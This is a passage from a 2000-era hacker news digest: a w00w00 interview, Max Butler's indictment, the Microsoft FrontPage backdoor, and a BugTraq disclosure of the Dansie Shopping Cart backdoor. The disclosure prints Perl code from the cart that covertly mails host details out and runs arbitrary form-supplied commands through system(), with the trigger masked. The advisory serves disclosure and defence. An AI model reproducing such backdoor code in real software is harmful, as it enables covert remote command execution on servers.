~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by dave920
The second issue of HYPE has been released by Black Market Enterprises
featuring w00w00.org. HWA Hax0r News is up to issue number 52.
BME
HWA Hax0r News
http://www.b-m-e.com/features.hype.w00w00.html
http://www.csoft.net/~hwa/HWA-hn52.txt
@HWA
51.1 [IND] HYPE - w00w00 zine
~~~~~~~~~~~~~~~~~~~~~~~~
w00w00
by dave920
page 1 of 2
So I decided it was time to release HYPE : Issue 2. I sent notice to BME
Online's mailing list that I was looking for another candidate to honor
for their contributions, and sure enough I was contacted by an online
friend (that I've actually met in person as well): xm of geekmafia. He
suggested that I take a gander at w00w00.org, a web address that I had not
even heard of before. Since I didn't even recognize it, I decided that I
would follow his suggestion and see what w00w00 was all about.
I was welcomely surprised. I learned that this organization was one of the
largest of its type (which made me feel a bit inferior for not knowing
about them before this). w00w00 is a compliation of many things, mainly
focused on being a computer security forum, "where people could share
technical information and become involved with some of the top people in
the industry." I was immediately interested.
w00w00 is a very relaxed organization and always expanding. It grew
because there was nothing like it that preceded its existance. In the
words of shok, which I agree with tremendously, "w00w00 is a freedom and
not a restriction."
I contacted shok with my request to have w00w00 be the cover for this
issue of HYPE, and he agreed. The following is the interview that took
place.
w00w00 by dave920
page 2 of 2
dave920: What caused w00w00 to arise as an organization?
w00w00: Well, it was not intentionally created. However, the reason that
it succeeded, was the lack of technical security forums, where people
could share technical information and become involved with some of the top
people in the industry. w00w00 is serving as something of a Studio 54,
where acceptance into the group is based on technical knowledge and not
reputation. There are limitations to other forums such as Phrack, L0pht,
and BugTraq. Phrack is a zine, not a forum. L0pht serves a similar purpose
but has been "closed" to all but a small few. BugTraq is a moderated and
fairly uninteractive email forum. w00w00 is the only one offering
technical information on such a wide scale. All members have a very
different background (different areas of knowledge, different countries,
different languages, etc.).
What was the original focus of w00w00, and how has that changed since its
foundation?
At first we tried to keep things very technical. Over time, it became
relaxed and people published work when they felt like it. The group grew
tremendously as a result of it. w00w00 is a loose association, in that
people can continue to work where they do or affiliate with other groups.
w00w00 is a freedom and not a restriction.
How do you feel that your organization has benefitted the Internet
community? In the same regards, how has w00w00 benefitted from it?
We've offered a forum unparallel to any other for the security community.
We've allowed all kinds of people to get together for a common cause (very
similar to a security conference, but online and available 365 days a
year). Without the Internet, w00w00 wouldn't be possible, as we're
entirely Internet-based.
What specific steps have you taken to further the advancement of w00w00?
We intentionally went for diversity, so that each member could grow from
the others. We've always allowed bright people to get involved, and we've
had key involvements with other groups and companies to increase the
commonwealth of the group and share resources.
How has your understanding of the computer underground changed through the
development of w00w00?
Hmm, interesting question. I would say that it allows us to see the
computer security community from both a corporate (many members work for
large security firms) and a security group view, that large corporations
don't have access to. It's allowed us to interact with both sides. As far
as how its changed our understanding, I can't say it has. What I would say
is that it brought the different understandings of different members and
merged them into a common one.
What would you say is the most significant accomplishment that w00w00 has
made?
Growing into not only the world's largest non-profit security
organization, but by far the most diverse in geographic distribution,
ethnic distribution, and technical distribution.
What do you plan for the future of your organization?
Continue to share information, continue to publish or work, and continue
to grow, grow, grow.
@HWA
52.0 [HNN] Max Vision Goes to Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by lseek99
After being hit with a fifteen count indictment last month Max Vision
(Max Butler) returned to court to hear the judge set the timetable for
the trail. Max vision has been charged with interception of
communications, computer intrusion and possession of stolen passwords
in connection with cyber intrusions of Department of Defense computer
systems in the Spring of 1998. Max had created the open source catalog
of IDS signatures known as arachNIDS as well as maintained
whitehats.com.
Security Focus
http://www.securityfocus.com/news/18
"White Hat" Hacker in Court Open source hacker "Max Vision" aided the FBI
while allegedly cracking the Pentagon. By Kevin Poulsen April 13, 2000
12:26 AM PT
A 27-year-old computer security expert and former FBI source returned to
federal court in San Jose, California Wednesday, where he stands accused
of penetrating a string of defense department and civilian computers.
Max Butler, known as "Max Vision" to friends and associates, was slammed
with a fifteen count indictment last month charging him with interception
of communications, computer intrusion and possession of stolen passwords
in connection with an alleged hacking spree in the Spring of 1998. At
Wednesday's appearance, Judge James Ware set a new date of May 8th for
laying down the timetable of deadlines and court appearances that lead to
trial.
Butler's indictment sent shockwaves through the close-knit community of
computer security experts who specialize in the arcane science of
intrusion detection - the careful analysis of Internet traffic for
"signatures" indicative of an attack. Butler is noted for creating and
maintaining arachNIDS, an open source catalog of attack signatures that
could be thought of as a clearinghouse of clues for Internet cybersleuths,
and is part of an overall public resource that Butler created at
WhiteHats.com.
In the parlance of hackers, "white hats" are ethical and law abiding --
distinguishable from "black hats" who crack computers without permission,
and "gray hats" who fall somewhere in between.
Martin Roesch, Director of Forensic Systems at network security startup
Hiverworld, says that until last month, there was no doubt what color
Butler's "hat" was. "He donated an immense amount of time to open source
security, and he did a hell of a job." says Roesch. "Everyone's using
arachNIDS." 'Butler has provided useful and timely information on computer
crimes in the past' -- FBI affidavit Roesch recruited Butler to join
Hiverworld as Vulnerability Engineer, luring him away from the consulting
work and penetration testing he performed as Max Vision Network Security.
According to Hiverworld, Butler passed a background check, and was to
start work on March 21st. He didn't make it.
"The day he was supposed to start he said he was unable to come in... and
that he would catch up with me in a day or two," recalls Hiverworld CTO
David Cruickshank. "That night, I had fallen asleep with the TV on, and I
woke up when I heard his name on the news."
Known Vulnerability Butler self-surrendered to authorities on March
21st, the day he was to begin his new job. He's charged with cracking
systems at McChord Air Force Base, NASA's Marshall Space Flight Center,
the Argonne and Brookhaven National Labs, IDSoftware, and an unspecified
Defense Department system. Another count alleges he unlawfully possessed
477 customer passwords from Aimnet, an ISP.
He plead not-guilty, and was released on March 24th on $100,000 in
signature and property bonds posted by friends in the open source
community, a dozen of whom reportedly flocked to the courtroom in support
of Butler.
According to an FBI affidavit dated July 2nd, 1998, executed by agent
Peter Trahon of the Bureau's San Francisco Computer Crime Squad, the
investigation that led to Butler began in May of that year, when the
Defense Department began suffering a rash of intrusions exploiting a
"recently discovered" vulnerability in a common piece of software called
BIND.
The devastating security hole formally known as the "iquery BIND Buffer
Overflow vulnerability" was publicly announced by Carnegie Mellon's
Computer Emergency Response Team (CERT) on April 8th, 1998, by which time
a new version of BIND without the bug was available. But a month later,
according to the affidavit, hackers were still using it to crack Air Force
systems, nuclear laboratories, the U.S. Departments of Commerce,
Transportation and the Interior, as well as the National Institute of
Health.
According to the statement, on May 21st, 1998 an Air Force investigator
tracked an intruder from McChord Air Force Base back to a computer at Los
Angeles Community College, which proved to be a staging ground for BIND
buffer overflow attacks on military sites all around the country.
Connection logs obtained from the college under a court order lead to a
particular Internet address at an ISP, where records obtained under a
second court order completed the trace to Max Butler's home telephone
number.
The telephone number was familiar to the FBI. "Max Butler is well known to
the [agents] of the Computer Crime Squad," the 1998 affidavit reads.
"Butler has been a confidential source... for the FBI for approximately 2
years. He has provided useful and timely information on computer crimes in
the past."
The affidavit notes that their source "has the ability to develop
techniques for, and commit, a sophisticated computer intrusion such as the
ones described herein."
"Hacker Witch-Hunt" The FBI searched Butler's home on July 2nd,
1998. But according to his lawyer, the raid didn't stop the Computer Crime
Squad from returning to Butler for more help.
Defense attorney Jennifer Granick, says her client's cooperation with the
FBI never involved informing on other people. "They used him for
technological help, and then they pressured him to do more than that, and
to do things he didn't want to do," says Granick. "They continued to seek
his assistance even after he became a suspect in this case." [Granick has
contributed to SecurityFocus.com.]
"The government then turns around in court and says he's dangerous and
he's a flight risk, even though they had continued to want to work with
him," says Granick, who declined to comment on other details of the case.
Assistant U.S. Attorney Ross Nadel -- Butler's prosecutor and the head of
Silicon Valley's "Computer Hacking and Intellectual Property" (CHIP) unit
-- didn't return phone calls Wednesday.
Butler is under advice from Granick not to speak to the press, and he
didn't answer an email inquiry. But in an April 3rd message to an
intrusion detection forum, Butler commented on what he termed the "frenzy
of the hacker witch-hunt."
"I am innocent until proven guilty and would appreciate the recognition of
this by our community," writes Butler, who also vows to continue his work
on open source security, though at a reduced capacity. "Due to my unusual
circumstances, the focus of my activities will shift to more professional
work and less pure research... I'll do what I can as the situation
allows."
Butler also railed against Hiverworld, which withdrew its employment offer
after learning of his indictment. "[T]he corporation expressed cowardice
that is deplorable. I can't tell you how disappointed I was to feel the
complete lack of support from the Hive," wrote Butler.
Hiverworld's Cruickshank says the company had no choice. "We're a security
start up that does intrusion detection and vulnerability scanning, so
having a person on staff who is under suspicion for major hacking
incidents is probably not the best idea in the world," says Cruickshank.
"As a security company," Cruickshank adds, "it's really important for us
to have white hats on board."
@HWA
53.0 [HNN] Mitnick On the Corporate Conference Circuit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by Weld Pond
Kevin Mitnick is making the rounds of the corporate conference
circuit. In
Salt Lake City next week he will lead a three-person panel
discussion on cyber security issues. He will join Rob Clyde, vice
president of security management at AXENT Technologies, Inc., and
Kelly White, senior consultant with Context Integration in a
discussion of cyber security issues.
PR Newswire - via Excite
http://news.excite.com/news/pr/000412/ut-uita-nettrends
Kevin Mitnick, Reformed Hacker, to Lead Cyber Security Panel at UITA's
NetTrends 2000
Information Security Experts to Give Utah Businesses a Wake-up Call
Updated 3:25 PM ET April 12, 2000 MIDVALE, Utah, April 12 /PRNewswire/ --
One of the most visible computer hackers in the world will be in Salt Lake
City next week to lead a three-person panel discussion on cyber security
issues. Kevin Mitnick has spent more than six of the last 20 years in jail
or prison for various technology related crimes. He was most recently
released from a medium-security federal prison in Lompoc, California after
being incarcerated for more than four years.
Next Wednesday Mitnick will join Rob Clyde, vice president of security
management at AXENT Technologies, Inc., and Kelly White, senior consultant
with Context Integration, in what is expected to be a free-wheeling panel
discussion on cyber security issues facing businesses and governments in
Utah and around the world.
The 75-minute cyber security panel discussion will be held from 1:00 p.m.
to 2:15 p.m. on Wednesday, April 19 at the Salt Palace Convention Center
in Salt Lake City. The panel discussion is part of a two-day event, April
19 and 20, produced by the Utah Information Technologies Association
called NetTrends 2000: The Digital Revolution.
"The Cyber Security panel will provide invaluable security information to
business leaders," said Richard Nelson, president and chief executive
officer of UITA. "Our panel of experts has nearly 50 years of combined
experience in information security. But what makes this panel truly unique
is the diversity of experience our panelists have. Rob has spent his
career creating computer security systems, Kelly has studied and tested
security systems and Kevin has built his expertise in circumventing these
systems. Together the three will discuss the real security issues facing
businesses today and the best solutions to effectively protect systems
from intrusion."
Mitnick is recognized by many as one of the most visible hackers in
history, including breaking into computer systems at some of the world's
largest corporations. As a reformed hacker, Mitnick's expert commentary
has been broadcast on CBS's 60 Minutes, CNN, Fox and CourtTV. In March
2000, he testified before the United States Senate in committee hearings
to explore ways to make computer systems safer from intruders.
As a founder of AXENT Technologies, Robert Clyde was a primary developer
of AXENT's original security management products and launched its security
consulting services. (AXENT is a provider of enterprise security solutions
for distributed computer environments.) Clyde has more than 20 years of
experience in security product development, management and consulting. He
has provided security consulting to Fortune 1000 companies and financial
institutions, advising CIOs and IT managers on how to solve security
problems at an enterprise level. Clyde is also a sought-after speaker at
security-related conferences.
Kelly White is a senior consultant with Context Integration, a provider of
business-to-business e-commerce solutions. Prior to joining Context
Integration, White was an Internet security specialist with Ernst & Young
LLP. As a security consultant, White conducted Internet attack and
penetration studies and designed Internet security architectures for
Fortune 1000 companies.
NetTrends 2000, Utah's premier IT conference, is focused on providing Utah
IT professionals with insights regarding today's best e-Business models,
future technologies and emerging trends. NetTrends 2000 will be held April
19-20 at the Salt Palace Convention Center in Salt Lake City, Utah.
NetTrends 2000 is a day and a half event running from 8:00 am to 4:00 p.m.
on April 19 and from 8:00 a.m. to 11:45 a.m. on April 20. The cost is $195
for UITA members and $295 for non-members. To register online, visit
www.uita.org or call Jennifer at 801-568-3500.
Utah Information Technologies Association is a non-profit organization
comprised of Utah information technology professionals dedicated to
providing services and events that enhance the growth of Utah's IT
community, consisting of over 2500 IT enterprises, through networking,
capital formation, skilled workforce development, positive media
recognition, public policy advocacy and marketing opportunities. For more
information about UITA or NetTrends 2000 visit www.uita.org or call
801-568-3500.
Contact: Richard Nelson of UITA, 801-568-3500, rnelson@uita.org; or David
Politis, dpolitis@politis.com, or Stephanie Dullum, sdullum@politis.com,
both of Politis Communications, 801-523-3730, for Utah Information
Technologies Association
@HWA
54.0 [HNN] AOL Liable for Music Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by root66
A German court has ruled that AOL Germany is liable for pirate music
held on its servers. The ruling stems from a case filed by Hit box in
1998. AOL says it will appeal and that there is no technical way that
it can monitor all its content all the time.
USA Today
http://www.usatoday.com/life/cyber/tech/review/crh053.htm
04/12/00- Updated 11:45 AM ET
German court: AOL liable for music piracy MUNICH, Germany (AP) - In a
ruling that could give the music industry a weapon against Internet
piracy, a court said Wednesday that America Online is responsible when
users swap bootleg music files on its service.
The case before a Bavarian state court in Munich originated with Hit Box
Software, a German company that sued AOL Germany for copyright violation
in 1998 after discovering that its digital music files were being
exchanged on the online service. An attorney for Hit Box, Stefan Ventroni,
hailed the ruling as an important step toward giving musicians better
protection against unauthorized use of their performances on the Internet.
''With this verdict, they can demand that such Internet pages be
blocked,'' he said.
AOL Germany said it would appeal. It argued that it lacks technical means
to monitor the service's huge data flow and that it had closed down the
forum where music was illegally swapped after learning of it.
''Total control of all pages on our servers is technically almost
impossible,'' said Alexander Adler, a spokesman for AOL Germany. ''Also,
that would amount to censorship.''
At issue were three instrumental versions of pop hits, including Get Down
by the Backstreet Boys, intended mainly for use as karaoke soundtracks.
Hit Box said each track, which normally costs up to $15 on a CD, was
downloaded for free more than 1,000 times via AOL.
Hit Box demanded about $50,000 in damages, but the court put off a ruling
on the size of the award.
Gema, Germany's main music licensing group, said the verdict was a signal
that Internet services need to introduce technologies to protect
copyrights online.
''The Internet is not a lawless space,'' spokesman Hans-Herwig Geyer said.
''Right now, the rights of creative artists are being trampled on in the
Internet.''
--------------------------------------------------------------------------
------ Copyright 2000 Associated Press. All rights reserved. This material
may not be published, broadcast, rewritten or redistributed.
@HWA
55.0 [HNN] Canadian ISP Reveals Credit Card Numbers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by Chris
Look Communications (formerly Internet Direct) allowed a file
containing personal information on over 1,000 people, including credit
card numbers to be accessible to anyone via the web. The file was in
place for over five days after the company was first notified before
it was removed. Toronto Star
National Post
http://www.thestar.com/thestar/back_issues/ED20000411/news/20000411NEW03_CI-CREDIT.html
http://www.nationalpost.com/financialpost.asp?f
Star:
Credit card files turn up on the Net Security breach at service provider
By Kerry Gillespie Toronto Star Staff Reporter More than 1,000
confidential records - including credit card numbers - were accessible on
the Internet for at least five days because of a security breach at one of
Canada's largest service providers.
A man surfing the Internet stumbled on the file and notified Look
Communications, formerly Internet Direct, of their problem on April 5.
The file disappeared briefly, but returned and was still there last night
when The Star called.
Nearly three hours later, the file was gone.
``We're shutting the whole thing down now and, frankly, I'll shut down the
whole system if I have to,'' Gary Kawaguchi, a shaken senior
vice-president said last night.
He had no idea how the security breach occurred or why the company hadn't
managed to deal with it when first notified.
``This whole thing is going to prompt us to have a third party security
scan on everything we do,'' Kawaguchi said.
Look Communications has some 175,000 customers across the country. But
most of the addresses on the file were from Ontario.
The man who found the file and doesn't want his name used got in touch
with K. K. Campbell, a Star columnist who writes about the Internet for
the Fast Forward section, after the company failed to fix the problem.
``I've been writing about this for close to 10 years and I've never seen
one so close to home,'' Campbell said. It was Toronto Councillor Jack
Layton's name that first jumped out at him.
``That's a bit scary to think it's that easily accessible,'' Layton said,
when notified that an older credit card of his was on the list. ``I wonder
how many thousands of dollars in fraudulent transactions have gone on. The
company certainly owes people an explanation.''
Kawaguchi said they notified the credit card companies last night.
The list contained names of people who subscribed to Ipass, a global
roaming service for the Internet that allows users to pay local rates
instead of long distance charges.
Jacqueline Miller, a graduate student who does a lot of work abroad,
applied for the service to save money. While upset that her American
Express card number was out in the open, Miller wasn't surprised. When she
originally tried to sign up for the Ipass service over the Internet, the
screen told her it wasn't a secure Web site.
``So I did it all verbally by the phone, because I refused to use their
Web site,'' she said. ``I told them at the time, but they insisted `No, it
is secure.' ''
Chris Davis, an Internet security specialist, said he was shocked.
``Any of those people on that list could sue that company,'' said Davis,
CEO of HeXedit Network Security Inc., from his Ottawa home last night.
Credit card information is supposed to be sent from the user to the
company on a secure encrypted link, he said.
Once it reaches the company it is un-encrypted for use but should then be
destroyed.
@HWA
56.0 [HNN] Vatis Concerned About Spoofing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by acopalyse
Micheal Vatis, director of the FBI's National Infrastructure
Protection Center has said that spoofing makes it very difficult for
the law enforcement to determine where an attack originates from.
Vatis proposed two possible solutions, enable civilians not bound by
the fourth amendment to conduct investigations or to somehow defeat
spoofing with better technology.
Computer Currents
http://www.currents.net/newstoday/00/04/13/news4.html
@HWA
57.0 [HNN] L0pht Releases CRYPTOCard Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by Silicosis
L0pht Labs at @Stake has released an advisory regarding the Palm Pilot
implementation of CRYPTOCard, a software challenge/response user
authentication system. L0pht has found that the users PIN can be
determined form the .PDB file stored on the Pilot. CRYPTOCard
Corporation has already provided a list of recommendations.
L0pht Labs at @Stake
Crypto Card Corporation
http://www.l0pht.com
http://www.cryptocard.com
@HWA
58.0 [HNN] Phone Company's Announce Security Initiative
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by ts
Mobil phone companies Ericson, Nokia, and Motorola have announced a
new initiative to secure online e-commerce via mobile phones by
creating an open global industry framework for more secure
transactions. The companies said that they would issue technical
bulletins about the initiative by the end of May.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2531636,00.html?chkpt
Cell phone giants in Net security pact
The world's top three mobile phone manufacturers teamed up to develop an
open, global industry framework for safer and simpler business over cell
phones.
By Kirstin Ridley, Reuters April 12, 2000 5:24 AM PT
LONDON -- The world's top three mobile phone manufacturers teamed up on
Tuesday in an attempt to secure the growth of e-commerce by developing an
open, global industry framework for safer and simpler business over cell
phones.
Dismissing concerns that current Internet-enabled phones are unsafe,
Sweden's Ericsson (Nasdaq: ERICY), Motorola (NYSE: MOT) of the United
States and Finland's Nokia (NYSE: NOK) called on industry peers to jump
aboard their initiative and ensure that customers can use mobile phones
for trusted, electronic transactions.
"A mobile device will be the platform to bridge the virtual and physical
worlds of e-business," said Matti Alahuhta, president of Nokia's mobile
phones division.
"Integrating security and transaction applications on a common core
standard and platform will create a global mass market for mobile
e-business," he added.
Encoding data sent over airwaves, establishing its authenticity, ensuring
confidentiality and preventing its unauthorized modification and use is
seen as vital to unleash the potential for a booming virtual business
world.
And the companies said the initiative is the key to ensure that growth
projections are met. Ericsson forecasts there will be around 1 billion
mobile telephone users and some 600 million mobile Internet subscribers
worldwide by 2004.
WAP phones need WIM Alahuhta conceded that WAP (Wireless Application
Protocol) mobile phones, which allow Internet access, carry no guarantee
that transactions are being made by the phone's owner.
The answer lies partially in WAP security functions such as WTLS (Wireless
Transport Layer Security) and WIM (Wireless Identification Module), which
will act as a user ID for access to the Internet and offer the
authentication for e-business that cell phone Internet transactions
currently lack.
The three industry heavyweights said their initiative went further than
that of Radicchio, a 36-member consortium of technology and telecom firms
across Europe, the United States and Japan that has also called for more
secure mobile e-commerce.
Radicchio backs Finnish Sonera's technology solution, a so-called public
key infrastructure (PKI)-based framework, which could be used as a global
standard to ensure that any data sent is scrambled into a tough code to
make it hacker-proof.
Ericsson, Motorola and Nokia also hope to help set up an industry standard
for a digital signature that will provide the authentication -- ensuring
the identity of users -- that is necessary for secure mobile e-commerce.
"The mobile device can be a tool for a variety of services, such as
banking and trading services, credit card and payment services,
loyalty/bonus services, and ID-card services," the companies said.
"The aim is to offer solutions where security and payment services will be
integrated as a standard into hundreds of millions of mobile devices in
years to come."
The three companies said they would issue technical and other details
about the initiative by the end of May on their Web sites and hope to
formulate an open framework before the summer.
@HWA
59.0 [HNN] Microsoft Admits to Backdoor in Server Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by McIntyre
Microsoft has admitted that a secret password exists in its Internet
Server software. The backdoor, brought to light by Rain Forest Puppy,
could allow an intruder complete remote access to the system.
Microsoft recommends that the file dvwssr.dll be deleted from Internet
Server installations with Front Page extensions installed. The
password has been present in the code for at least three years and
Microsoft has said that it is conducting an internal investigation.
Wall Street Journal - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2543490,00.html
MS admits planting secret password
Microsoft engineers placed a password in server software that could be
used to gain illicit access to hundreds of thousands of Internet sites
worldwide.
By Ted Bridis, WSJ Interactive Edition UPDATED April 14, 2000 12:50 PM PT
Microsoft Corp. acknowledged Thursday that its engineers included in some
of its Internet software a secret password -- a phrase deriding their
rivals at Netscape as "weenies" -- that could be used to gain illicit
access to hundreds of thousands of Internet sites worldwide. The
manager of Microsoft's security-response center, Steve Lipner,
acknowledged the online-security risk in an interview Thursday and
described such a backdoor password as "absolutely against our policy" and
a firing offense for the as-yet-unidentified employees.
The company planned to warn customers as soon as possible with an e-mail
bulletin and an advisory published on its corporate Web site. Microsoft
(Nasdaq: MSFT) urged customers to delete the computer file--called
"dvwssr.dll"--containing the offending code. The file is installed on the
company's Internet-server software with Frontpage 98 extensions.
While there are no reports that the alleged security flaw has been
exploited, the affected software is believed to be used by many Web sites.
By using the so-called back door, a hacker may be able to gain access to
key Web-site management files, which could in turn provide a road map to
such things as customer credit-card numbers, said security experts who
discovered the password.
Two security experts discovered the rogue computer code -- part of which
was the denigrating comment "Netscape engineers are weenies!" -- buried
within the 3-year-old piece of software. It was apparently written by a
Microsoft employee near the peak of the hard-fought wars between Netscape
Communications Corp. and Microsoft over their versions of Internet-browser
software. Netscape later was acquired by America Online Inc.
One of the experts who helped identify the file is a professional security
consultant known widely among the Internet underground as "Rain Forest
Puppy." Despite his unusual moniker, he is highly regarded by experts and
helped publicize a serious flaw in Microsoft's Internet-server software
last summer that put hundreds of high-profile Web sites at risk of
intrusion.
Almost every Web-hosting provider Russ Cooper, who runs the popular
NT Bugtraq discussion forum on the Internet, estimated that the problem
threatened "almost every Web-hosting provider."
"It's a serious flaw," Cooper said. "Chances are, you're going to find
some major sites that still have it enabled." Lipner of Microsoft said the
company will warn the nation's largest Web-site providers directly.
In an e-mail to Microsoft earlier Thursday, Rain Forest Puppy complained
that the affected code threatened to "improve a hacker's experience."
Experts said the risk was greatest at commercial Internet-hosting
providers, which maintain hundreds or thousands of separate Web sites for
different organizations.
Lipner said the problem doesn't affect Internet servers running Windows
2000 or the latest version of its server extensions included in Frontpage
2000.
The digital gaffe initially was discovered by a Europe-based employee of
ClientLogic Corp. (www.clientlogic.com) of Nashville, Tenn., which sells
e-commerce technology. The company declined to comment because of its
coming stock sale. The other expert, Rain Forest Puppy, said he was tipped
off to the code by a ClientLogic employee.
When asked about the hidden insult Thursday, Jon Mittelhauser, one of
Netscape's original engineers, called it "classic engineer rivalry."
@HWA
60.0 [HNN] Backdoor Found in E-Commerce Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by brian
Currently being used at over 200 e-commerce sites, Dansie Shopping
Cart, contains code that allows the author to remotely enter the
system and run code on the server. The back door was discovered by
Blarg Online Services which allows someone to remotely enter the
server and issue commands to run CGI scripts. There has been no
response from Dansie in regard to the allegations.
Internet News
http://www.internetnews.com/ec-news/article/0,2171,4_340591,00.html
Shopping Cart Program Leaves Back Door Open By Brian McWilliams
The developer of a highly-rated ecommerce shopping cart is accused of
building a software backdoor into the program that could give him or
hackers complete control of the server on which it's installed.
The Dansie Shopping Cart, which is currently in use at more than 200
e-commerce sites and is recommended by several Web hosting firms, contains
code that enables the author, Craig Dansie of Moreno Valley, Calif., to
potentially run any command on the Web server.
"He doesn't have the right to execute commands on our server without our
authorization. That is technically a hack, and he put it into his code
deliberately. It's unconscionable," said Joe Harris, a technical support
representative at Blarg Online Services in Seattle. Harris discovered the
hidden capability while helping a client install the Dansie Shopping Cart,
a CGI script written in the Perl language, and publici zed his findings
earlier this week on the Bugtraq security mailing list.
According to Harris, Dansie built a subroutine into the cart which enables
him to use a nine-character form element or password to remotely execute
commands on the server using the broad security privileges usually
assigned to CGI scripts. But because the password is the same for every
installation of the cart, and because the script must be installed with
world-readable permission, anybody who has access to a server on which the
cart is installed could retrieve the source code and the form element and
use it to control other servers, according to Harris.
"It takes little imagination to dream up the potential havoc and privacy
violations this level of access could result in -- from stealing private
customer records to a full-blown crack of an e-commerce server," said
Harris.
Dansie did not respond to repeated requests for comment. The telephone
number listed in the domain record for dansie.net was disconnected
sometime Thursday. And a list of several hundred customers was removed
from the site Wednesday evening.
Licenses for the Dansie cart start at $150 and range up to $650 for the
mall version which can handle an unlimited number of merchants on the same
server.
According to Kasey Johns, Webmaster for Lonestar Badge and Sign of
Martindale, Texas, the backdoor in the Dansie cart appears to be a means
of protecting against unauthorized installations and of ensuring
compliance with the software's licensing terms, which specifically
prohibit modifying the source code. Johns said he learned of the backdoor
in late March while trying to debug an installation problem.
"I tried to make some changes to it, and basically he deleted the script
right off of my server. That just doesn't seem right," said Johns.
In an e-mail to Johns Wednesday, Dansie accused him of piracy and asserted
that "The software has a copyright protection feature that poses NO
security risk to your Web site or your Web server."
But Johns said Dansie's anti-piracy efforts are over zealous. "I want the
right to look at the code, make modifications, and not be locked into
whatever ghosts the author has hiding in there," said Johns.
According to Allan Knight, Webmaster for ValueWebHosting in Williamsville,
New York, which has over 60 hosting clients using the cart, Dansie
recently denied that the program passed information back to him. Knight,
who has been using the cart for three years, said Thursday he was not
aware that the script gave Dansie or others the ability to execute
arbitrary commands. But Knight said he had no plans to stop using the
software.
"I have never had any reason to shed any distrust on Craig whatsoever,"
said Knight.
While Dansie could issue a patch to customers to disable the backdoor,
Harris said prudent users will uninstall the software and find a new
shopping cart provider.
"His credibility is destroyed. Would you ever again trust anybody who did
this? Imagine if it had been Microsoft," Harris said.
http://www.dansie.net/cart.html
http://www.blarg.net/
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-04-08&msg=Pine.LNX.3.95.1000411171050.24527G-100000@animal.blarg.net
To: BugTraq
Subject: Back Door in Commercial Shopping Cart
Date: Tue Apr 11 2000 02:24:06
Author: Joe
Message-ID: <Pine.LNX.3.95.1000411171050.24527G-100000@animal.blarg.net>
Trojanized Commercial Shopping Cart
===============================================================
Dansie Shopping Cart
Version : 3.04 (presumably earlier versions as well)
Author : Craig Dansie
URL : http://www.dansie.net/
Language : Perl (both NT and Unix platforms are vulnerable)
License : Commercial, starting at $150.00
Copyright Dec 10, 1997-2000, Dansie Website Design
Synopsis : This program -deliberately- allows arbitrary commands to be
executed on the victim server.
One of our clients, while installing and configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart program, and
our secure server setup. While trying to assist our client with the cart
and PGP configuration we discovered a couple of things.
The CGI, under certain conditions, sends an email to the author of the
Dansie shopping cart software, 'tech@dansie.net'. This is not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine 'there2':
------
sub there2
{
$_ = "$_[0]";
tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
tr/_/-/;
tr/\@/\./;
return $_;
}
-------
The call that creates this email address and sends the mail is the
function 'there3'.
-------
sub there3
{
if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
{
$a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
$b = &there2('8v59_3jhhzi8');
pop(@there2);
pop(@there2);
$c = &there2("@there2");
open (TECH, "|$mailprog $a");
print TECH "To: $a\n";
print TECH "From: $a\n";
print TECH "Subject: $b\n\n";
print TECH "$path3\n";
print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
print TECH "$c\n";
print TECH "$e $there\n" if ($e);
close (TECH);
}
}
-------
The ciphered strings, when passed through 'there2', result in:
8v59 == tech
kte3cv == dansie
ev8 == net
8v59_3jhhzi8 == tech-support
$a == tech@dansie.net
$b == Subject: tech-support
This seems curious, but plausible reasons could include insuring License
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is being sent.
While going through the rest of the code we discovered a much more
interesting item.
(We've masked out the actual trigger element with question marks)
----------
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) )
{
if ( $ENV{'OS'} )
{
system("$FORM{'?????????'}");
}
else
{
open(ELIF,"|$FORM{'?????????'}");
}
exit;
}
---------
The form element '?????????', which was originally a pseudo-random appearing
nine digit string of letters and numbers, allows an intruder to execute any
command on the server with the same privileges as the CGI process itself.
Although this is a full disclosure list, the trigger element is obscured to
prevent the script kiddies from running away with this back door. If you
own the cart, then you have access to the source code and can discover the
element in question easily enough on your own.
Further searches through the code reveal that this form element is immune
to data validation - it gets passed into this code fragment unchallenged.
The '$d' variable of the condition which permits the back door to function
is set elsewhere in the program to contain the string 'dansie'. (Again,
using the ciphertext algorithm) This indicates that the form element won't
work on Dansie's own host, but will work on anyone elses. There are
additional problems with the 'there' function but we'll leave them as
exercises for the reader to decipher.
Dansie.net, armed with the server name and URL to the CGI executable
provided by the cloaked email routine, would be able to run commands on any
web server on the Internet that has the Dansie Shopping Cart installed. It
takes little imagination to dream up the potential havoc and privacy
violations this level of access could result in; from stealing private
customer records to a full-blown crack of an E-Commerce server.
When checking to see if this was a known issue, the following post from
"Kasey Johns" <kasey at corridor dot net>, made a little over a week ago,
